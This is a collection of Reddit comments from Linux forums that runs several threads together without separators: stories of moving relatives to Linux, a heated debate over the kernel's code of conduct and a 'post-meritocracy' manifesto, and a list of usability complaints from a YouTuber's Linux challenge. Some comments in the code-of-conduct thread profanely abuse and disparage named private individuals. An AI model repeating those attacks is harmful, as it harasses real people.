My most fond memory of getting into Linux was when my friend told me over the phone, "Dselect". After that I bet you can figure it out". The struggle was real for a couple days coming to realization that "deselect" didn't have a hyphen in it...

And he was right. 
My parents use Linux on their daily computer. They have had 0 problems for years. 

With Windows, they needed help with issues, things changing, updates not installing, things popping up asking them new things, etc etc..

Linux can be really stable and great for older people who didn't grow up with technology. Rapid change sucks in that context.
You never go full Linux!
Mandrake was a thing. Nothing comes close still.
In a world without walls, who needs Gates or Windows? 
When I started to work we were given Linux computers and I was the only one from the new guys who used Linux before (and I have a Mac as my main machine, so no windows). I kept saying (half jokingly, half seriously) how Windows is shit and Linux is life, and they kept complaining. Now they’re only using Linux and complain whenever they have to use windows machines.
I've been using Linux since kernel 0.99 and slackware. However my work is Windows Windows Windows for everything. I've tried dual boot machines as well as vmware virtual machines. In the end I just take my laptop with me and use it for all the nice things. None of my children have any interest in linux: they all use Mac, or various Windows flavours.  So in my family, Linux is seen as a sort of old man thing (I'm 57.)
When I was 15 I got a job as the I.T guy for a small business with about 8 to 15 employees they had all this old ass hardware and needed desktops for every one. So I ended up installing xubuntu on all of the old ass Dell PC they had with 2 gbs of ram Max and shitty 1.2 GHz dual core Intel procs. This was 6 years ago and to this day they are using the same desktops with no issues what so ever. #linuxislife
And then you woke up - happens to me as well all the nights.
it's easy to get used to the good stuff.
7 years back, installed Ubuntu on my home system. My Father and my brothers \- they all hated me for that. Luckily, things changed. Now my father can install packages his own (he is like 70). My brothers use mostly linux now. They like it now because they don't have to worry about viruses whenever they use a USB drive.
I had a buddy years ago who trashed his machine twice in one month due to his porn habit. After the second time of cleaning I set up Ubuntu as a dual boot and told him to satisfy his lusts in Linux and then reboot back to Windows when he was done. That’s gotta be eight years ago or so. Not one call since. 
> This speaks loudly to how far linux has come

Or rather, not loudly at all, considering you haven't heard a peep anymore. ;)
I have 2 laptops, and I converted one to Linux Mint. It had Windows 8.1 when I got it, and I couldn't get past the windows LIVE password (The woman who gave it to me didn't know it either).  (the win 7 backdoor access trick doesn't work on a win 8.1 secured with Microsoft LIVE) .  I ended up Installing Linux Mint 18.3 Cinnamon on it, and it works alright.  The only issues I have had with it, are: 

1. It will freeze at times
2. It is a little slower than Win 7 when opening folders and programs.  

Now, i'm sure my Issues are due to the rather weak Laptop I am using, which was the cheapest laptop they had at Walmart in early 2012 (Compaq Presario cq57, $298, Jan. 2012)  This is currently the Laptop I use at work, and it does good for managing Ebay postings, book keeping, and the other tasks it does. It browses the web faster than my Windows , until it freezes. Even so, my Windows freezes a lot as well, more so than the linux . 

I have a Toshiba Laptop from oct 2011, that has a little better specs, and still runs win 7, albiet very slowly. I might convert it over as well. The only reason I haven't yet, is I'm trying to sort out WINE, and I need to back it up.  
I tried to get my dad set up with Ubuntu a few weeks ago. He didn’t really fancy the whole having to edit /etc/fstab with a bunch of weird jargon just to permanently mount a network share bit.
Hah, that sounds like my mom. I installed Linux on her laptop and no longer have calls because something was wrong with her computer. Funily my step dad still runs windows 10 and constantly complains about it and my mom always tells him just install Linux.
I would have switched to Linux a decade ago except for my need for video editing. I think Kdenlive was around but it kept crashing, no doubt because of the age of my desktop pc at the time.

A year ago I discovered Maui Linux (based on Ubuntu and comes with Kdenlive). Finally able to do everything I needed. I was still dual booting Windows 10 but hardly ever booted into it (maybe for Rufus).

However, successive Windows updates have broken my laptop three times now, so a couple of weeks ago I wiped the whole thing and just went with Maui. All in.

I'm also interested in the people saying they got their parents using linux. I'd love to get my parents doing that.
Yeah. The people who say Linux is complicated and technical either haven't used a modern Linux or are power users who has a compulsion to poke around under the hood.

If you just want a hands-off experience which works, a modern Linux will deliver that.
I kind if find this hard to believe.  I love Linux, but stuff will break in it more frequently than OSX and probably even windows.  There's a great community of fellow users happy to help you fix your problems, but to imply it's trouble free for a novice user over months of use just seems to be untruthful
Never go full linux
Good to hear, I've converted my Mother and Father's computers to Linux (Mint and Lubuntu respectively) along with about 15 other people and tech support calls have been minimal, I get maybe 20 calls a year now versus the 20 ish calls a month (or week if I was unlucky) that happened when they were on Windows XP/7/8. Linux has come far and it's design is a lot simpler for a lot of task, say setting up printers for example is crazy easy in Linux vs Windows (especially Windows 10 where you need to get the driver packages from the Windows store....then it just doesn't fucking work lol)
[deleted]
This is so relatable. I'm like you and I have a friends that comitted partially to Linux, no one has fully committed (YET)
I converted my brother and my sister to Linux.  It took a bit over twenty years.
Any suggestions on which to run? I was thinking about having windows 10 and dual booting Linux also.
I was full Linux from 2008 until Ubuntu dropped Unity, but that's just the fun way to open my statement. I actually I'm using Windows on my laptop now because it's a Surface Book and I'm afraid of the driver situation. Also, with WSL, lots of cross platform support in programming languages, and some servers still running Ubuntu Server at home and on Vultr, I really don't think much about the operating system on my laptop. When I try to compile a C library... That's when I wish I was on Linux. 🙄
[deleted]
I enjoy using Deepin myself it's a beautify designed distro. Still has its bugs and issues, but it's enjoyable to use. 
Two days ago `apt autoremove` tried to nuke gdm and gnome-shell after a regular upgrade on my Ubuntu 18.04 box ¯\\\_(ツ)_/¯
/u/munchinbeavers
Same, except I'm mocked for using Linux.
I have to stop gaming if I want to switch to Linux... That's all that's stopping me to go full Linux.
You went full Linux!

You never go full Linux!
Never go full.... oh wait...
A few years back my friend had an old desktop. It was running Windows Vista and running like crap. He asked me if there is anything I can do. I didn't have a Win7 installation disk so I just offered Linux. He didn't know what that was and then I asked him "What do you use the computer for?" he responded that he just needs emails. Switched him over to Linux Mint and he loved it. 

Within the last year he bought a laptop with Windows 10 on it. 

I recently just got a text from my friend telling me that his machine was freezing up and after a little bit of troubleshooting it was the windows store process taking up all his resources. After a few text back and forth I got a text I never thought I would receive. It was "Never had these problems with linux". Fast forward some texts, I am going by to install Mint for him later on this week. 

Still in shock honestly.
I have 3 desktop machines and a laptop that I actively use. Of the 3 desktop machines, only one (my gaming machine) runs Windows 10. Everything else is Linux, including my laptop.

Recently, with the latest major Windows 10 update, I noticed the little desktop switcher icon had changed. I click on it, and, instead of just seeing what apps I had open on which workspace, I also saw a list of everything I had been doing on my machine for the last week or so. Websites visited, files opened, programs used, you name it. This "feature" is called [Activity History](https://privacy.microsoft.com/en-us/windows-10-activity-history-and-privacy), and as you might suspect it is on by default. I'm not exactly sure if AH was part of the last major update (I think it was), but I can say that AH wasn't there when I initially installed Win10 some 3 years ago and made sure all the telemetry stuff was turned off. AH is not hard to turn off, but still.

I recently picked up a PS4 about a month and half ago. I'm seriously considering making a few sacrifices with certain PC game titles and moving away from Windows entirely. I figure I can just use a console for certain popular titles, and play whatever titles are available for Linux on Steam. (I've been a PC gamer since the '90s, so this is kind of a big deal for me.) That Activity History shit creeped me out, not only for what it did, but also in how they just slipped it in there.
Just got defenestrated two weeks ago and sent Windows to /root/.local/share/Trash

Totally adopted the Pinguin too, 4 years after my old man, better later than never they say
I won't comment too much on this. I have just seen it, and I would like to put this information here for people to see it and discuss the direction in which the Linux community is going.

The ["Post-Meritocracy manifesto"](https://postmeritocracy.org/) is a document created by transgender activist Coraline Ada Ehmke. She is the author of [the Covenant code of conduct that was accepted by the Linux Kernel yesterday](https://old.reddit.com/r/linux/comments/9geb3n/the_linux_kernel_replaces_code_of_conflict_with/?st=jm6rkf8f&sh=22b473bb) and is famous for creating at least a dozen Github shitstorms trying to purge ideological dissidents, sometimes for remarks made in their personal Twitter accounts. [Here you can see a meltdown that this person went through just one month ago](https://i.imgur.com/aksUZ7Z.png)

These are the manifesto's first paragraphs:

>Meritocracy is a founding principle of the open source movement, and the ideal of meritocracy is perpetuated throughout our field in the way people are recruited, hired, retained, promoted, and valued.
>
>But meritocracy has consistently shown itself to mainly benefit those with privilege, to the exclusion of underrepresented people in technology. The idea of merit is in fact never clearly defined; rather, it seems to be a form of recognition, an acknowledgement that “this person is valuable insofar as they are like me.”

They also believe that,

>Interpersonal skills are at least as important as technical skills [...] We acknowledge the value of non-technical contributors as equal to the value of technical contributors.

I think you get the idea. Well, if you scroll down, you will see that one of the signers of this manifesto is Patricia Torvalds, Linus Torvalds' daughter.

[In an interview on opensource.com three years ago](https://opensource.com/life/15/8/patricia-torvalds-interview), Patricia, who runs the Portland branch of "Guerrilla Feminism", affirms the need for "safe spaces" in the Open Source community:

>I think this applies well to attracting and maintaining a talented and diverse mix of contributors: **Safe spaces are important**. I have seen the misogynistic and racist comments made in some open source communities, and subsequent dismissals when people point out the issues. I think that in maintaining a professional community there have to be strong standards on what constitutes harassment or inappropriate conduct.

These are her takes on meritocracy:

>I also think that some community leaders just don't value diversity. It's really easy to argue that tech is a meritocracy, and the reason there are so few marginalized people in tech is just that they aren't interested, and that the problem comes from earlier on in the pipeline. **They argue that if someone is good enough at their job, their gender or race or sexual orientation doesn't matter. That's the easy argument. But I was raised not to make excuses for mistakes. And I think the lack of diversity is a mistake, and that we should be taking responsibility for it and actively trying to make it better**.

I think that the direction in which Linux -and possibly Linus- is heading is really clear: "Diversity" is more important than merit. And it's worrying, to say the least.
But I like my kernel developed by people who... **can** develop kernels? Isn't that what merit means? No one is asking you to submit a gender or sexuality test before you contribute. 

Surely every submission is by nature scrutinised. Expect criticism. It's not like this is a majorly important piece of software impacting millions or anything.
Diversity is never more important than merit. People should be hired based on qualification, not identification.
Okay, fine.

Radio silence, lads. No social media at all. No Twitter, no Facebook, no Snapchat or Quora. No Medium, no public communication at all. Code, submit, thumbs up or down, done.

You don't get to know who I am anymore. You will judge me on the only thing I allow you to know, the quality of my work.

If you find fault with that, so be it. But you will know nothing else about me. Ever.
My main problem with diversity is that people think it means skin color and sex chromosomes.

Diversity means diversity of perspectives. It means different people with different ideas.

Anyone who can't see how that isn't valuable to a business or nonprofit or any other kind of team isn't using their noggin.

A white person hiring black programmers who dress, walk, and talk just like you, and who watched the same shows as you growing up, and who like the same music as you...well that's not diversity just because they are black and you are not.

Actual diversity is not something you can gauge by how someone looks. It's all about ideas and perspectives. Sure, another ethnic group is more likely to be different from you than your own, but that's no guarantee.

Other than that, I'm very much pro-diversity. I just want everyone to be honest about what that means.

EDIT: I really want to say that in most cases, a diverse workplace will probably have plenty of different skin colors, a fairly even mix of men and women, and maybe even people from different religions and cultures. But what's really important is what's in their heads, not in their skin or in their pants. You want people with different mixes of Big Five personality traits, not necessarily different mixes of melanin-producing genes.

In a way, making diversity about race and gender only perpetuates the bigotry you are trying to fight against. The message I learned growing up was that the person was supposed to be more important than any category you could put them in. That's a two-way street. Don't ever forget that.
[deleted]
The last thing I thought would be plagued by identity politics is linux.
>"Diversity" is more important than merit. And it's worrying, to say the least.

How long until this thread is deleted?
What software does this break?
[deleted]
[deleted]
All of this is so unbelievably worrying.

How can they not see what they are doing? Meritocracy is the very foundation OSS is built upon.

I would understand adopting a mild and very basic CoC in order to encourage positive and productive collaboration. But such an ideological piece from this unbelievably toxic author...

Linus, what the fuck are you doing?! You're letting everyone down!
> Portland branch of "Guerrilla Feminism"

If you had not posted a link I would have thought your were making a sly joke.

Diversity means nothing.  It is as empty a buzz word as the cloud.  It means something different to everyone who hears it.  

The goal of Linux is to produce something that works.  You don't produce Diversity.  You don't code Diversity.  

More people producing good code and contributing is a great and measurable goal.  
> meritocracy has consistently shown itself to mainly benefit those with privilege, to the exclusion of underrepresented people in technology

Like, when?

This sentence alone is so insane, I can't even continue reading without feeling sick.

I hope all the top contributors quit and start a new project without the craze. Let the "guerilla feminists" try and do the hard work of engineerig complex software. Fucking extremists destroying society again.
If you think that diversity is more important than merit, you're completely misreading what the entire movement is about.

You should read what Linus said [https://lkml.org/lkml/2018/9/16/167](https://lkml.org/lkml/2018/9/16/167)

He's realizing that you can't badger and berate people, using curse words, and public shaming to enforce control. Those environments are actively hostile towards other people who may have different viewpoints.

You can be the best damned c programmer in the world, but still feel shut out of a community that allows for and normalizes that type of behavior.
It's things like this that cause me to worry about who will succeed Torvalds, and what will become of Linux without him at the helm.
[removed]
Thank God the Linux kernel is fully open-source, and can be forked at any time if manure makes contact with the ventilation apparatus.
It's odd how "diversity" always means the same thing: a few different skin colors and a mix of sexes (but not white and not male), and now a person's idea about sexuality (but not "cis"). How truly bizarre. Actual diversity, e.g. in thought, (relevant) perspectives, even life experiences and culture - coupled with competence, are never what is meant. Every person is unique and forcing a particular set of physical attributes (the least important kind) as being the defining  characteristics of "diversity" is truly a worrisome direction for society.

[deleted]
Killing meritocracy destroyed Windows and a bunch of browsers, it nearly destroyed github (by that same person's hand), every company forcing diversity only outputs horrible games, Google basically self-operates while the staff does the heavy astroturfing. This won't be any different. 
Yeah people who write something like this ("meritocracy is useless") are way too deep up their own ass.

I mean, do they not understand that consistently judging people by their merit would be a huge progress for society as a whole? Instead, this is not good enough for them. They want to solve issues that can only addressed by government (unfair distribution of wealth, unequal education levels, ghettos) on a societal level and don't even have a firm ethical basis for their kind of *racism* ("we want to help less privileged people"). [And how exactly are you helping them by creating resentment and making people think that they can't get through on their merit?]

Clearly any sane person would prefer an utopia in which people are acknowledged based on their merit and not out of charity or misguided quotas. Of course in that society underprivileged people showing promise would receive funding to realize their potential and education would be free. Introducing other kinds of inequality to balance out unwanted inequalities is not going to help in the long run and IMHO completely misguided.

As a lefty myself I wish the modern left would focus on these things that actually matter (redistribution of wealth, higher wages, free education, free healthcare, basic income) instead of this useless societal agitation that will achieve nothing of value.

The beauty of open source is that you will only by judged by the quality (and maybe beauty) of your code, nothing else. Hackers and Open Source advocates have been the most progressive people I have ever seen, because they truly don't give a crap whether you are disabled, LGBT or of a particular race. These self-appointed societal architects want to take that away from us.
[deleted]
"We understand that working in our field is a privilege, not a right." Jesus Christ, did everyone get their coding licences 
Read the actual changes to the Code of Conduct that were comitted. There is nothing controversial in it and it has nothing to do with post-meritocracy.

This is guilt by association because the original author of the CoC that this CoC is based on has written some other wacky stuff.
I would like to quote Armin Ronacher here

> Tech for recent historical reasons is very male heavy but society is not. Meritocracy in many ways is just sourcing the best from the pool of naturally available people in your environment. Sure by some measurements you will get the best but is the best really what is lacking in an Open Source project? We don't need more of the best, we need more of what is actually missing and what is missing in many ways is not more strong alpha males but people that are good in de-escalating arguments in bug trackers and mailing lists, people that take care of documentations, people that make software work in new cultural contexts (localization, globalization, internationalization, etc.), people that care about user experience etc.


Read his whole blog post here: http://lucumr.pocoo.org/2017/6/5/diversity-in-technology/
How is this discussion relevant in a project which is open to the whole world and to which anyone can contribute anonymously?
>"Diversity" is more important than merit. And it's worrying, to say the least.

This is the new way of saying "Equality of outcome over Equality of Opportunity"  

They want equality of outcome, which means you have sacrifice equality of opportunity. 


A few days ago I made a comment on reddit about wanting to maybe consider switching to another distro because of the AMA of arch linux team. One of the redditors have reminded me to consider distros on the quality that they strive for as oppsed to their skills on effective communication and social ability. I thought about it and it made sense. I took that advice.

Now with Linus' apology unfolding and this, I don't know what to think anymore. Will linux keep the current standard of quality of code? will it matter whether or not it does? 

I'm sincerely asking this as an end-user, as a person who does not, and cannot for the lack of ability, contribute to the code. What effect does this have on end users, if at all?


People are misinterpreting the rules laid down by these new codes of conduct. Their purpose is to keep people focused on the code and not on the drama.

Meritocracy comes from both writing good code and not being an asshole. Tolerating one because of the other is not ok, more so in places where discussions should be purely technical.
My main problem with any CoC is the abuse because anything can be considered a violation due to messy human emotions. Sometimes people get frustrated, and it should be allowed. Then these psychopaths waltz in with their CoC and an excuse to ban/gatekeep a community, of course depending on who they like.
Can’t believe social justice warriors and identity politics are bleeding into the world of Linux. Holy shiz. God help us all. 
I swear, this whole thing is like attacking some bizarre straw man version of meritocracy. I firmly believe that there are biases in tech communities that may result in certain minorities being disadvantaged... This is even possible to show via the same type of studies these people claim show that meritocracy is a failure. But the only reasonable conclusion I can draw from this is that nothing is a perfect meritocracy, and in some cases may not be meritocratic at all. Therefor increase in ACTUAL meritocracy would solve the problems these people complain about. And with regard to interpersonal skills being as important as technical skills... well, yes. I agree with this. Anyone who has worked on a large project, in software or otherwise should understand this. But this doesn not do anything to go against the idea of meritocracy. An individual's interpersonal and communication skills are simply another aspect of their merit.

We should be working towards a more true meritocracy and eliminate any bias in our communities than throwing the idea of meritocracy in the trash altogether.
Yes, because the most important thing about a kernel is the color of the creators' skin and what's between their legs.

This is seriously troubling. Got a good commit to solve a security issue? Sorry, you arent diverse enough. Want to improve the performance of our memory management? Nope, you have too much 'privledge'. 

Is nothing safe from SJWs in 2018? What next?
If you want to control an organization/group politics has proven to be highly effective way in doing so, this should not come as a surprise 
The interview that she did with opensource.com brings up some good points, actually.

> I'm actually not active in particular open source communities. I feel much more comfortable discussing computing with other women

And

> I have seen the misogynistic and racist comments made in some open source communities, and subsequent dismissals when people point out the issues. I think that in maintaining a professional community there have to be strong standards on what constitutes harassment or inappropriate conduct. 

I don't know about you, but I know a lot of women (personally and professionally) who are developers or sysadmins. None of them are involved in free software or open source communities. They may develop free (e.g., MIT-licensed) code, but they stay far far away from any sort of open source community (for example /r/linux) because it's too toxic.

Personally I think it's a shame and something that should be addressed. As I see it now, there are kind of 3 ecosystems that are developing:

1. Corporate software, which is (inconsistently) doing okay overall with accepting different people. Big corporations have figured out how to set ground rules for "don't be a dick too each other" and are happily having men and women writing code together.
1. Traditional free software and open source communities, which are almost entirely men, and no one seems to have a problem with that, for some reason.
1. Feminist software communities, which are much newer, and are doing much the same things as the old free software and open source communities, but in an environment more comfortable for women.

The split between #2 and #3 seems very unfortunate for me. It would be nice if they could work together. I think good on Patricia for saying there's something in group #2 that needs to be addressed and corrected.
It sounds like part of their idea is, existing projects are not living up to the ideal of meritocracy, but they are using meritocracy as an excuse to exclude perfectly good contributions or otherwise be assholes. An open, welcoming community might be more productive.

Whether you agree with the points here on the whole or not, learn from them. Try to be open and welcoming to all new contributors, whether they think like you or not. If you're trying to be a meritocracy, don't use it as an excuse to be a dick to outsiders or newbies or amateurs, because being a dick doesn't help, and don't use it as an excuse to pick contributions by your friends over equally good contributions by others, because that's the opposite of your stated goal.

Don't just worry about the buzzwords of "meritocracy" or "post-meritocracy" or "identity" governance -- consider the principles underlying each and derive the best from each.
Oh boy I'm sure this post will spur some solid discussion instead of endless strawmanning about SJWs.
I wonder how Cathedral and the Bazaar sales are doing right about now.
And what has this to do with Linux? The manifesto isn't specifically about Linux . The only relation is Patricia Torvalds, which is coincidentally the Daughter of Linus. I don't see the effect on Linux. If I had such an influence some redditors asume Patricia has  over her dad my dad would run Linux. ;-)
This subreddit is such garbage.  Are you all really going to start attacking / blaming Linus' daughter for this?

Beyond how shitty that would be, imagine how fast Linus would become "woke" if the internet starts harrassing *her* over *his* decisions.

Y'all need to calm down.
Linus should have returned to Finland before his children were out of elementary school so they wouldn't be subjected to poz brainwashing during their most intellectually formative years.
> is famous for creating at least a dozen Github shitstorms trying to purge ideological dissidents,

> a meltdown that this person went through just one month ago

I'm glad you have decided to not comment on this too much, but you may not have gone far enough.
Can we light a fire under improving GNU Hurd now?
I don't think that you can reason nor have an intelligent discussion  with these kind of people. Because reason and facts are bad while emotions and feelings is everything for them. 

Personally I am not sure how deal with deluded people, they run amok even of you show them that two plus two equals four.


Fascism is the continuous creep of political ideology into every facet of a society.

Your operating system is no longer safe and we're one step closer to the telescreen.

Wow this is serious they actually are seriously going against meritocracy to pull their ideological bullshit. This is no joke for peter's sake. 
This post is trash
That's quite  disturbing. 
It's fun seeing stemlords freak out over nothing
I'm not actually sure about the meritocracy part of your thread (I don't have a good opinion on it yet/if ever), but that twitter tirade was actually completely fine.

First she talks about "ignoring politics is a privilege" and in recent times (like a year or two) I've come to see that that's completely true. People who say they don't want politics in their whatever are still playing politics, by saying you want the status quo. By not choosing a side, or not wanting to, you are in itself choosing a side, the side of the status quo. People want to have no politics but in the climate nowadays everything actually IS politics.

Here's an article that I think summarizes it, though I think she really could have gone more in depth. It's not the perfect article, I need to find one that goes deeper imo. https://lifehacker.com/everything-is-political-and-always-has-been-1818724298

Here's the relevant quote: 
>Where do we get this idea that it’s possible to avoid making political statements? Well, if the police don’t spend much time in your mostly white suburb, protests of police violence are a spectator sport you can choose not to watch. If you can’t get pregnant, access to birth control and abortion is something you can ignore. If you don’t know any undocumented people, DACA seems like a political football with no relevance to your life. The only way to pretend that something is “not political” is to not have a stake in it.

Just expand this statement to tech, just because YOU don't have a problem doesn't mean there aren't problems worth talking about.

Secondly she talked about how some people in her zone (ruby/open source/etc) don't do anything to make this better and play it safe. I don't know anything about this space so I don't have anything to say here.  She mentions not being someone's personal google to ask how to help, I understand that's annoying, but maybe she should have a resource of things to things to actually help? She's probably just tired of explaining it to people, but I don't think she realizes that many people actually know nothing about this stuff. They've never needed to pay attention to it.

tl;dr this stuff isn't actually as bad as you think. there are legitimate problems you can have with stuff like this, it's not as open and shut as some of these people make it out to be.
Linus apologizes for His "Bad Behavior" and now this.

wtf did I miss :S
I know you’re very mad online about the Linux adopting a new CoC but dragging Torvalds’ kids into this is just bad form and makes you look bad. I don’t see how personalizing this is going to ingratiate anyone to your views on the subject.
using language as vague as "merit" was always a shitshow. it was always used by people insecure with their emotions to rationalize them liking/not-liking something/one on the grounds of some objective standard.  
[deleted]
Oh man. I'm sure it'll not be long before Coraline and Linus' daughter start receiving death threats on Twitter. It's gamergate all over again...

These girls' personal life have nothing to do with the kernel development or /r/linux. Mods, I urge you to stop this alt-right bs before it gets too far
Krug already censored 5 comments, I don't know what they were about, and I may never know, way to go! Don't have a dissenting opinion, it's against the rules!
Where were you when meritocracy was kill? 


[removed]
[deleted]
[removed]
[removed]
Fuck you Patricia.

I better not get the kernel fucked over cuz of you.
Did Linus just assume everyones kernel? 

(I don't know how to write a proper version of that joke, and it doesn't fit this topic in particular, but it feels fitting for the debate over the last few days)
I read the original post here as alt-right, given its dismissive phrasing. However, I want to give OP credit for starting the discussion.

"Post-meritocracy" as a defining characteristic doesn't really say much. The world, for as far as humanity has dominated its history, has been largely power-based. This has not, and will not, change.

Valuing diversity of opinion is a good trait. It encourages innovation and explores ideas that might be outside the box.

Claiming that "merit" as a word has no meaning is narrow-minded. "Merit" has multiple meanings, and just because the author of the _Post-Meritocracy Manifesto_ believes it has no meaning ignores a large percentage of humanity's understanding.

Ultimately, most of us - including, yes, those people you hate - are looking to make humanity better. The last thing we should do is dismiss viewpoints out of hand because they disagree with our assumptions of how humanity should behave.
[removed]
[deleted]
https://github.com/glibg10b/ltt-linux-challenge-issues/

If you have a fix for one of these issues or you can describe it better than is described here, please [create an issue](https://github.com/glibg10b/ltt-linux-challenge-issues/issues/new/choose) or submit a pull request.
For the window lag in Linux Mint, there is a related and very old [bug report](https://github.com/linuxmint/Cinnamon/issues/2465).
it reminds me of what gnome/canonical used to do. the papercut project - a big list of small but annoying bugs that would really put users off.
> The check boxes under "Hardware Configuration" look like radio buttons.

I think it's fixed in the recent Breeze/Plasma 5.23. It only took [7 years](https://forum.kde.org/viewtopic.php?t=123108) ;)
Minor, but I'd like to mention that mouse acceleration is turned on by default on Windows as well. Mouse acceleration is useful for non-gamers. In Windows, the setting is called "Enhance pointer precision" and it adds both positive and negative acceleration. It's a lot harder to reach the enable / disable checkbox for it on Windows, though.
There is no controller issue with Cave Story. Linus didn't hit the toggle for it. Linus only thought it was an issue because he was overwhelmed by other things not working.

NVEC did show up in OBS, but Linus wants for Nvidia to bring the newer version of NVENC to Linux.

The Compression Archive didn't appear to finish instantly, the issue was that Linus's monitor was too big so he didn't see the tiny popup in the corner. But I agree that hiding the file or renaming the unfinished file to be more clear is a good idea.
I think we should clarify that by "large screen" you mean a 50 inch tv that he's sitting like a foot from. the notification was quite literally outside his peripheral vision lmao. Would be nice to get a progress indicator inside the dolphin window itself, but I hardly think anyone else is going to have issues with not seeing the notification.
Show desktop button shows desktop o.o
Next step: create a static site arewelinusyet.com and put all of these into a static web page to track the progress, lol.

Like [arewewaylandyet.com](https://arewewaylandyet.com) or [areweguiyet.com](https://areweguiyet.com).
it's great to use the attention of this channel to address problems that have been bothering voiceless users for a long time. i think it's a good thing to collect these problems and aim to fix them.

however i want to add a little nuance and foreshadowing:

it's rarely the case that problems persist because developers just sit there idling while not knowing what to do with their time. projects rarely starve from lack of user feedback. its almost always the developers time that's the limited resource. this means that bringing attention to one problem may merely shift the attention from one problem to another. thats not neccecarily a bad thing it's just that some people could fall for thinking that if only every problem was brought to attention by a famous youtuber then linux would be golden. that's obviously not the case and it would probably cause a lot of confusion, infights and drama.

that being said, bringing focus to the right things might help to get priorities right so developers gain an insight on what the biggest roadblocks for a wide adoption may be. there also are those few stubborn developers who insist on doing things their way, the old way or the "logical" way and ONLY that way. some of their design choices are really annoying to new users but they persist because advanced users became accustomed enough with it to not complain loudly enough. a daily driver challenge from new unbiased users provides a fresh and thus more objective few on some issues can can act as catalysts in discussions.

thats where i see the biggest strengths with this style of feedback. however this is also the biggest danger. in the all so mighty professional world of ui application development it's all about telemetry analysing every single mousemovement, preference and behavioral detail. they need all that personal information while they ignore the glaring issues that people post in their bug trackers for free if they even have one. they would have to create that hydra of data collection, ai, cloud services and big data just so they can guess what the users are telling them for ages.

but they seem to prefer the data and guessing method because it's oh, so objective. it's only objective if the interpretation is correct. the correct interpretation doesnt matter becasue you now have *numbers* and numbers are always right. if you sit in a meeting and you tell something nobody is going to object you if you have *numbers*

so if something doesnt get used enough its immediately at risk of being removed to get rid of supposed clutter and not to confuse the user even if its a functionality that is vital for some users even if it is not needed frequently. on the other hand if something is clicked very often because the ui requires you because of an inefficient workflow then this behavior will be amplified because it's apparently so successful.

**THIS MUST NOT HAPPEN WITH OPEN SOURCE PROJECTS.**

listen to user feedback, be open to different approaches but dont give in to everything. decide on how it actually affects a workflow and on the range of users it can accomodate. dont fall for the dumbing down and feature removal trend because statistics apparently dictate it but also dont stubbornly make it hard for new users if a new ux doesnt take anything away from powerusers.
Unpopular Opinion: Thanks to Linus and Luke I'm using Elementary OS on my main work laptop, only on my desktop do I use Windows, because I need Lightroom to my secondary work.

Been loving my experience with Linux, I know Elementary is very "basic" and "simple" but I had a great experience, not everything is perfect, but its ok.
[deleted]
Others not much, but not showing progress bar while copying file or archiving using gui tools like Ark is a bug. The sad part is, it sometime works. When it does, the progress bar does not get focus (could be lost in myriad of windows), and on top of that you have to resize the little window to actually see the progress. Also, if you cancel, it keeps the temporary file (the garbled file).

On top of that, you cannot be sure when a file is done copying because it says file copied, but if you try to unmount, the device is still not done copying. Also, why keep the .Trash folder on external device and not clean it when unmounting. When I want to delete a file in an external device, I really want to delete the file and use the free space for something else.

I know what to expect from the tool, but it can be nuisance for others.
I'm not sure if this is a typo or really a complaint because I don't watch LTT really. Manjaro doesn't use apt, it uses Pamac I thought.
I mentioned this on the other thread. Linux Desktop Environments pretend that files are successfully copied to USB (with 100% progress bar and everything) but in reality the files are still being copied in the background. You need to run a `sync` command in the terminal to be sure.

This is the real issue Linus ran into. He double-clicked on a file but it wasn't done copying yet.
If these guys can use their popularity to help Linux get even better, I'm all for it.  I love what they've done recently for the popularity of gaming on Linux
No disrespect to any other distro. I myself am an Arch user. I honestly believe new users should start with Ubuntu mainstream with Gnome and not try any other variants like Pop_OS. Mint is fine because it is pretty much Ubuntu, although I've always felt that Ubuntu is a more polished experience for new users.

I have friends who wanted to try out Linux for gaming. I nudged them all towards Ubuntu and they never had any issues like Linus did. Just like Luke didn't have too many issues either.
I think an awful lot of the issues Linus had are first time issues that when you try to do a second time arent an issue.

For instance his issue installing fonts, looking on twitter/youtube comments and people are "this is why i wouldnt use linux, takes too long to do everything"

Well no. Its only a problem installing a font, THE FIRST TIME YOU DO IT, then you do this miraculous thing called learning. The second time you want to install a font, its just as quick as it would be in Windows.

Zipping files, sure, the first time it takes longer than it would normally take you, but once you know how to do it, subsequent attempts take just as long as they would in windows.

For instance, their third part yesterday on doing simple tasks, sure, first time round it took time. But if they were given those tasks to do again tomorrow, they would do all of them in a matter of minutes.
For Ark I just swapped it out for lxqt-archiver. It still works perfectly fine on KDE since it also uses QT, and is somehow more functional than Ark.

You can also install pcmanfm-qt if you really need to do root file operations, along with lxqt-sudo instead of kdesu if your distro has the root account disabled.
I feel like KDE would benefit a lot from having some kind of migration tool for windows (and perhaps mac) users, which changes defaults (keybinds, default behavior of widgets, buttons and layout of dolphin) to closer match windows and briefly explains the differences in workflows for every day stuff that can't be configured to match.

Or maybe just an overall customization tool which you see on first login. "Welcome to plasma! How would you like to use your desktop?"

"Default settings" -> Standard KDE (Or distro-specific?) experience

"Customize"  -> walkthrough colour theme, fonts etc. Play into the strengths of plasma's customization. Less powerful than doing it yourself but good enough for new users without being overwhelmed by options.

"Help! What's a plasma? Isn't this windows?" -> do the initial idea, set up to work similar to windows and give a brief intro of what they can expect to be different. It shouldn't try to mimic windows like those Windows themes obviously, but make things more familiar. Like minimize to desktop by default instead of show desktop.
I call BS on the apt-get on Manjaro issue from part 2 of the series. Linus said his Manjaro installation tried to install some dependencies for apt and then failed. Why would it do anything more than a "command not found" error? He must be lying or trolling.
> Right-click drag doesn't work in Dolphin.

It's left-click drag. I don't think that is much of an issue.
The amount of denial and lack of self-reflection in these threads amazes me.

I run over 300 x Workstations using Ubuntu in a corporate environment. The amount of scripts and tweaks I have to run on a new installation for CORE FUNCTIONALITY is mindboggling. Things break in user space all the time,  and I'm talking about simple office work, scan, and print.
The mouse acceleration hate is unreal. I like it.
I honestly feel Linus made a mistake by selecting Manjaro with the intention of gaming. Ubuntu and similar distros are so much simpler. Better way to get started with Linux.
I use Fedora. I dont have any of their problems. Every shortcut is customizable and every window behavior can be tweaked.

Linus issue with dolphin is his own ignorance and inability to pay attention. 

Maybe he should switch on his brain.
I don't understand the issue with mouse acceleration, why would anyone want to have it disabled by default?
Christ there's a lot of people in the comments who clearly forget what they were like the very first time they tried Linux after years of using Windows.
Is this an issue..?

>Linus doesn't like this an that.

OMG.
